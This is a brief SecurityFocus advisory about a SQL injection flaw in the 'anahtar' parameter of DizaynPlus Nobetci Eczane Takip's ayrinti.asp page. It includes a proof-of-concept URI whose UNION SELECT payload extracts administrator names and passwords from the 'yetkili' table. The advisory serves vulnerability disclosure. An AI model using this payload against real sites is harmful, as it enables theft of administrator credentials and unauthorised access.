DizaynPlus Nobetci Eczane Takip 'ayrinti.asp' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following proof-of-concept URI is available:

http://www.example.com/lab/nobetcideczane/ayrinti.asp?anahtar=1+union+select+0,1,2,(admin),sifre,5+from+yetkili


 

Privacy Statement
Copyright 2010, SecurityFocus